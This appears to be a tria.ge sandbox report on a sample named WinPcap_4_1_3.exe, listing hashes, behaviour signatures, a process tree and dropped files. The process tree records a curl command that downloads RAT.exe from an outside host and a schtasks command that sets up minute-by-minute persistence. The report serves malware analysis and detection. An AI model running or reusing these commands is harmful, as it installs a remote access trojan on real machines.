Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

WinPcap_4_1_3.exe

windows11-21h2-x64

8

$PLUGINSDI...ns.dll

windows11-21h2-x64

3

$SYSDIR/Packet.dll

windows11-21h2-x64

1

$SYSDIR/pthreadVC.dll

windows11-21h2-x64

1

$SYSDIR/wpcap.dll

windows11-21h2-x64

1

WinPcapInstall.dll

windows11-21h2-x64

1

rpcapd.exe

windows11-21h2-x64

1

Analysis

  • max time kernel
    534s
  • max time network
    538s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05/04/2024, 18:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WinPcap_4_1_3.exe

  • Size

    893KB

  • MD5

    a11a2f0cfe6d0b4c50945989db6360cd

  • SHA1

    e2516fcd1573e70334c8f50bee5241cdfdf48a00

  • SHA256

    fc4623b113a1f603c0d9ad5f83130bd6de1c62b973be9892305132389c8588de

  • SHA512

    2652d84eb91ca7957b4fb3ff77313e5dae978960492669242df4f246296f1bedaa48c0d33ffb286b2859a1b86ef5460060b551edca597b4ec60ee08676877c70

  • SSDEEP

    24576:UBOldyR6ORWsaM2QROxa6jsqUENfJjNK/CG6niqiL:2KzqWsayROxa6QDENuaG+ifL

Score
8/10
persistence

Malware Config

Signatures

  • Downloads MZ/PE file
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\WinPcap_4_1_3.exe
    "C:\Users\Admin\AppData\Local\Temp\WinPcap_4_1_3.exe"
    1⤵
    • Loads dropped DLL
    PID:5012
  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2104
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4924
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd5aca3cb8,0x7ffd5aca3cc8,0x7ffd5aca3cd8
      2⤵
        PID:5048
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
        2⤵
          PID:4692
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1512
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:8
          2⤵
            PID:580
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
            2⤵
              PID:1268
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
              2⤵
                PID:1208
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
                2⤵
                  PID:112
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                  2⤵
                    PID:1632
                • C:\Windows\System32\CompPkgSrv.exe
                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                  1⤵
                    PID:1760
                  • C:\Windows\System32\CompPkgSrv.exe
                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                    1⤵
                      PID:2272
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                      1⤵
                        PID:836
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe"
                        1⤵
                          PID:4312
                          • C:\Windows\system32\curl.exe
                            curl http://risk.g-s.nu:2051/RAT.exe -o RAT.exe
                            2⤵
                              PID:1276
                            • C:\Windows\system32\mstsc.exe
                              mstsc
                              2⤵
                              • Enumerates connected drives
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: AddClipboardFormatListener
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              PID:1832
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:5016
                            • C:\Users\Admin\Downloads\e\RAT.exe
                              "C:\Users\Admin\Downloads\e\RAT.exe"
                              1⤵
                              • Drops startup file
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of SetWindowsHookEx
                              PID:2576
                              • C:\Windows\System32\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SteamWebhelper" /tr "C:\Users\Admin\AppData\Roaming\SteamWebhelper"
                                2⤵
                                • Creates scheduled task(s)
                                PID:2208
                            • C:\Users\Admin\AppData\Roaming\SteamWebhelper
                              C:\Users\Admin\AppData\Roaming\SteamWebhelper
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4896
                            • C:\Users\Admin\AppData\Roaming\SteamWebhelper
                              C:\Users\Admin\AppData\Roaming\SteamWebhelper
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1108
                            • C:\Windows\system32\AUDIODG.EXE
                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004E8
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4088
                            • C:\Users\Admin\Downloads\e\RAT.exe
                              "C:\Users\Admin\Downloads\e\RAT.exe"
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:592
                            • C:\Users\Admin\Downloads\e\RAT.exe
                              "C:\Users\Admin\Downloads\e\RAT.exe"
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4964
                            • C:\Users\Admin\AppData\Roaming\SteamWebhelper
                              C:\Users\Admin\AppData\Roaming\SteamWebhelper
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3600

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SteamWebhelper.log
                              Filesize

                              654B

                              MD5

                              2cbbb74b7da1f720b48ed31085cbd5b8

                              SHA1

                              79caa9a3ea8abe1b9c4326c3633da64a5f724964

                              SHA256

                              e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

                              SHA512

                              ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              ded21ddc295846e2b00e1fd766c807db

                              SHA1

                              497eb7c9c09cb2a247b4a3663ce808869872b410

                              SHA256

                              26025f86effef56caa2ee50a64e219c762944b1e50e465be3a6b454bc0ed7305

                              SHA512

                              ddfaa73032590de904bba398331fdbf188741d96a17116ada50298b42d6eb7b20d6e50b0cfae8b17e2f145997b8ebce6c8196e6f46fbe11f133d3d82ce3656db

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              a0407c5de270b9ae0ceee6cb9b61bbf1

                              SHA1

                              fb2bb8184c1b8e680bf873e5537e1260f057751e

                              SHA256

                              a56989933628f6a677ad09f634fc9b7dd9cf7d06c72a76ddbb8221bc4a62ffcd

                              SHA512

                              65162bf07705dfdd348d4eaf0a3feba08dc2c0942a3a052b4492d0675ab803b104c03c945f5608fac9544681e0fe8b81d1aaca859663e79aa87fcb591ddb8136

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                              Filesize

                              180B

                              MD5

                              00a455d9d155394bfb4b52258c97c5e5

                              SHA1

                              2761d0c955353e1982a588a3df78f2744cfaa9df

                              SHA256

                              45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed

                              SHA512

                              9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              5KB

                              MD5

                              a62d9fda9bb733f941cfbbab3477cd10

                              SHA1

                              36e402cf32c4bc35a95373dca1c407f5671b490f

                              SHA256

                              cf5231ce3a4f3f193db5c652d610cb33972215a025dcf41d54b3a66a4fa3cfc5

                              SHA512

                              063258743dc180050f01d76f4c7850a3794ec0ca8617927d75138a41c1f629f08d0693ecd9db8149157dd35c67c8cb199931221cc60658b1166643645e15829d

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              5KB

                              MD5

                              ca527ceae117c6da77f57c089ad9f2e8

                              SHA1

                              cad0986fd7b095a48c0edbf109c8e5cbf6e22160

                              SHA256

                              af3d861fb570b8e42606ffcb8699eadee72798ecbc501d8351f822c5115f5c88

                              SHA512

                              001359007d4130035a6d1e0444a5902cbca48dc4ca3a93e128ca52209ca5051c0fc885a07c5a04c05b8de0d8f3282cfe7d65296e236382dacee5901b6d072b92

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                              Filesize

                              11KB

                              MD5

                              7a538da27b944995ac6ab4c6a0de1302

                              SHA1

                              9160d5b28ab926f9667190f7187a100b08c3ea36

                              SHA256

                              e149c5b41b784c92ae16f92a7267713a4348a80b12d6d1f8b96073bf84df9836

                              SHA512

                              f2a08c6408a069ce78840ae51986356b391777c630d4ed1647654c81496e49d984a8bb32f0577b32fe67ca3fa2b0539a4965d494b7b4ab180fbe4a9337b46d50

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
                              Filesize

                              11KB

                              MD5

                              f2de638a4259125fdc63c3e174803714

                              SHA1

                              c2dc76d32dbc368e8b576a5dd9e0a2a7a5d6fa66

                              SHA256

                              c76921cb128864fa1ede8f5f96285a688474149a4d0ef6f15ae131250649a297

                              SHA512

                              625a76f433d1b50172950eea73425706e5be7547d589f0b660d7ffab6440f9f1542acc1944d20d64ba493c15c420593b12b53e6ad8fe181c0134001581aa7b19

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
                              Filesize

                              11KB

                              MD5

                              31490a459c198da08ac2babda98140fe

                              SHA1

                              7d0ce403bc81bf92be58d7ad48763948920e8737

                              SHA256

                              f1cbb3423476a4c6fac691d9dd20e577518781c4ca79874e74d52f2961a62276

                              SHA512

                              1ff445b321634318fdca6fd7f946088a8309d283824205b5d1f9ac4d544d492bd608aa324e292ce99d332c747be3f49a59090b91e46e296335822d5d400fc715

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\nsh664C.tmp\InstallOptions.dll
                              Filesize

                              14KB

                              MD5

                              325b008aec81e5aaa57096f05d4212b5

                              SHA1

                              27a2d89747a20305b6518438eff5b9f57f7df5c3

                              SHA256

                              c9cd5c9609e70005926ae5171726a4142ffbcccc771d307efcd195dafc1e6b4b

                              SHA512

                              18362b3aee529a27e85cc087627ecf6e2d21196d725f499c4a185cb3a380999f43ff1833a8ebec3f5ba1d3a113ef83185770e663854121f2d8b885790115afdf

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\nsh664C.tmp\UserInfo.dll
                              Filesize

                              4KB

                              MD5

                              7579ade7ae1747a31960a228ce02e666

                              SHA1

                              8ec8571a296737e819dcf86353a43fcf8ec63351

                              SHA256

                              564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5

                              SHA512

                              a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\nsh664C.tmp\ioSpecial.ini
                              Filesize

                              578B

                              MD5

                              4952b850293fb96582800eec5a78f693

                              SHA1

                              0212a27615e97ef4b50ec32664d0539ad710ea7a

                              SHA256

                              eef3794ba8f5476293c5e04f9daf48bfc9f3e5169108f1b66ae225ebb5f43730

                              SHA512

                              272f63954ce64624b4b6a1ecf433ec245ddb1ac7a76ba9a51a9e86b0404d037f28a9ae357ca0f236783f2c1861a1655dc3d1772838ac1b4112dd545c71218f9c

                              Download Submit

                            • C:\Users\Admin\Downloads\e\RAT.exe
                              Filesize

                              255KB

                              MD5

                              46f50a1d5f46385a99e484eaea4ab436

                              SHA1

                              366f70e2b551fbeb9f6c2e98029a59549b28ea8f

                              SHA256

                              ae0c2a94d8cafeebea42458cab07bc8a372776e3125ad2c02489e60deeef3507

                              SHA512

                              96c6c5c6fbbf3389fccca1e7079ae2d66916a1008534bc82b84669c1ec4cf1fdd27deeec774ade2cf441e18765a6f473aee7a0e55ff2dafd190e85ce172d6837

                              Download Submit

                            • memory/592-284-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/592-282-0x000000001BC90000-0x000000001BCA0000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/592-281-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/1108-259-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/1108-260-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/2576-224-0x00000000012C0000-0x00000000012D0000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/2576-222-0x0000000000950000-0x0000000000996000-memory.dmp

                              Filesize

                              280KB

                              Download

                            • memory/2576-223-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/2576-255-0x00000000012C0000-0x00000000012D0000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/2576-244-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/2576-233-0x00000000012C0000-0x00000000012D0000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/2576-252-0x00000000012C0000-0x00000000012D0000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/3600-291-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/3600-292-0x00000000030F0000-0x0000000003100000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/3600-293-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/4896-251-0x000000001B9E0000-0x000000001B9F0000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/4896-254-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/4896-250-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/4964-288-0x000000001B770000-0x000000001B780000-memory.dmp

                              Filesize

                              64KB

                              Download

                            • memory/4964-287-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/4964-289-0x00007FFD59D10000-0x00007FFD5A7D2000-memory.dmp

                              Filesize

                              10.8MB

                              Download